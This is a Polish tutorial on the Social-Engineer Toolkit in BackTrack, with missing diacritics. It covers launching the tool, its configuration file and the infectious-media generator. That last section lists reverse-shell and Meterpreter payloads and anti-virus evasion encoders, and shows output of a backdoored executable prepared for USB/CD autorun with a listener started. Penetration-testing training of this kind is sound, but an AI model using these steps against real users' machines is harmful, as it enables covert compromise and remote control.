Wprowadzenie do pakietu SET

Aby uruchomi pakiet SET w systemie BackTrack, naley w konsoli terminala wprowadzi nastpujc ciek dostpu:
root@bt:~# cd /pentest/exploits/set
root@bt:/pentest/exploits/set# ./set

Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit
-----------------------------------------------------------------------------

Praca z plikiem konfiguracyjnym pakietu SET

Plik konfiguracyjny set_config znajduje si w katalogu /pentest/exploits/set/config i mona go otworzy w nastpujcy sposb: 

root@bt:/pentest/exploits/set# nano config/set_config


### Define the path to MetaSploit, for example: /pentest/exploits/framework3
// Zdefiniuj tutaj ciek do Metasploit, np. /pentest/exploits/framework3.
METASPLOIT_PATH=/opt/metasploit/apps/pro/msf3

### Define to use Ettercap or not when using website only - set to ON and OFF
// Zdefiniuj, czy chcesz uywa narzdzia Ettercap podczas wykonywania atakw WWW. Moliwe ustawienia to ON i OFF.
ETTERCAP=OFF
#
### Ettercap home directory (needed for DNS_spoof)
// Katalog gwny ETTERCAP (wymagany dla DNS_spoof)
ETTERCAP_PATH=/usr/share/ettercap
### Specify what interface you want ettercap or DSNiff to listen on, if nothing will default
// Okrel, na ktrym interfejsie ma nasuchiwa Ettercap lub DSNiff. W przypadku braku wpisu zostanie zastosowana warto domylna.
ETTERCAP_INTERFACE=eth0

### SendMail ON or OFF for spoofing email addresser
// Wczenie (ON) lub wyczenie (OFF) serwera SENDMAIL dla atakw podszywania si pod adresy e-mail.
SENDMAIL=OFF

### Create sef-signed Java applets and spoof publisher note this requires you to
// Stwrz aplet Javy z wasnym podpisem i podszyj si pod notk wydawcy. To wymaga 
### Install ---> JAVA 6 JDK, BT5 OR UBUNTU USERS: apt-get install openjdk-6-jdk
// zainstalowania rodowiska JAVA 6 JDK. W systemie BT5 lub UBUNTU zastosuj polecenie: apt-get install openjdk-6-jdk.
### If this is not installed it will not work. Can also do: apt-get install sun-java6-jdk
// Jeeli Java nie zostanie zainstalowana, serwer nie bdzie dziaa. Moesz rwnie tego dokona, stosujc polecenie: apt-get install sun-java6-jdk.
SELF_SIGNED_APPLET=OFF

# ## Auto detection of IP address interface utilizing Google, set this ON if you want
// Autowykrywanie interfejsu adresu IP za pomoc wyszukiwarki Google. Ustaw warto ON, jeli chcesz.
AUTO_DETECT=ON

### Use Apache instead of the standard Python web server. This will increase the speed
// Uyj serwera Apache zamiast standardowych serwerw WWW Python. Zwikszy to szybko
### of the attack vector
// przeprowadzania ataku za pomoc tego wektora.
APACHE_SERVER=OFF
#
### Path to the Apache web root
// cieka do gwnego katalogu (root) serwera WWW Apache
APACHE_DIRECTORY=/var/www

### Turn onn ssl certificates for set secure communications through web_attack vector
// Wcz obsug certyfikatw SSL w celu zwikszenia bezpieczestwa komunikacji w czasie przeprowadzania ataku WWW. 
WEBATTACK_SSL=OFF

### Path to the pem file to utilize certificates with the web attack vector (required)
// cieka do pliku PEM w celu wykorzystania certyfikatw przy przeprowadzaniu ataku WWW (wymagane).
### You can create your own utilizing set, just turn on self_signed_cert
// Moesz stworzy do tego celu wasny zestaw; wystarczy ustawi SELF_SIGNED_CERT z wartoci ON.
### If your using this flaf, ensure openssl is installed!
// Jeeli uywasz tej flagi, upewnij si, e masz zainstalowany Open SSL.
SELF_SIGNED_CERT=OFF

### Disables automatic listener - turn this off if you don't want a metasploit listener in the background.
// Wyczanie automatycznego nasuchiwacza. Wycz (OFF) t opcj, jeeli nie chcesz uywa nasuchiwacza frameworku Metasploit w tle.
AUTOMATIC_LISTENER=ON

### This will disable the functionality if metasploit is not installed and you just want to use setoolkit or ratte for payloads
// Ta opcja wyczy funkcjonalno frameworku Metasploit, jeeli ten framework nie jest zainstalowany, a Ty chcesz uywa narzdzia SETOOLKIT lub RATTE przy obsudze adunkw
### or the other attack vectors.
// lub przy przeprowadzaniu innych atakw.
METASPLOIT_MODE=ON


----------------------------------------------------------------------------------

Generator zainfekowanych nonikw danych

Ten wektor ataku opiera si na prostej zasadzie generowania zoliwego pliku wykonywalnego, a nastpnie zakodowania go za pomoc dostpnych koderw w celu ominicia ochrony antywirusowej. Oto kilka przykadw dostpnych do wygenerowania adunkw wraz z opisem:
Name:                                   Description:
1. Windows Shell Reverse_TCP            Spawn a command shell on 
                                        victim and send back to attacker. // Tworzy powok  polece na maszynie ofiary i poczenie zwrotne do atakujcego.
2. Windows Reverse_TCP Meterpreter      Spawn a meterpreter shell on 
                                        victim and send back to attacker. // Tworzy powok Meterpretera na maszynie ofiary i poczenie zwrotne do atakujcego.
3. Windows Reverse_TCP VNC DLL          Spawn a VNC server on victim 
                                        and send back to attacker. // Uruchamia serwer VNC na maszynie ofiary i tworzy poczenie zwrotne do atakujcego.
4. Windows Bind Shell                   Execute payload and create an 
                                        accepting port on remote system. // Uruchamia adunek i tworzy port akceptujcy na zdalnym systemie.
5. Windows Bind Shell X64               Windows x64 Command Shell, 
                                        Bind TCP Inline // Tworzy powok polece na systemie Windows x64, uruchamia polecenie wizania TCP.
6. Windows Shell Reverse_TCP X64        Windows X64 Command Shell, 
                                        Reverse TCP Inline // Tworzy powok polece na systemie Windows x64, uruchamia polecenie poczenia zwrotnego TCP.                              
7. Windows Meterpreter Reverse_TCP X64  Connect back to the attacker 
                                        (Windows x64), Meterpreter // Tworzy poczenie zwrotne z atakujcym (Windows x64), uruchamia Meterpreter.
8. Windows Meterpreter Egress Buster    Spawn a meterpreter shell and find a port home
                                        via multiple ports // Tworzy powok Meterpretera i znajduje port docelowy, przeszukujc wiele portw.
9. Import your own executable           Specify a path for your own executable // Okrel ciek dostpu do wasnych plikw wykonywalnych.

Enter choice (hit enter for default):
Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

[*] Your attack has been created in the SET home directory folder "autorun"
[*] Copy the contents of the folder to a CD/DVD/USB to autorun.
[*] The payload can be found in the SET home directory.

[*] Do you want to start the listener now? yes or no: yes
[*] Please wait while the Metasploit listener is loaded...

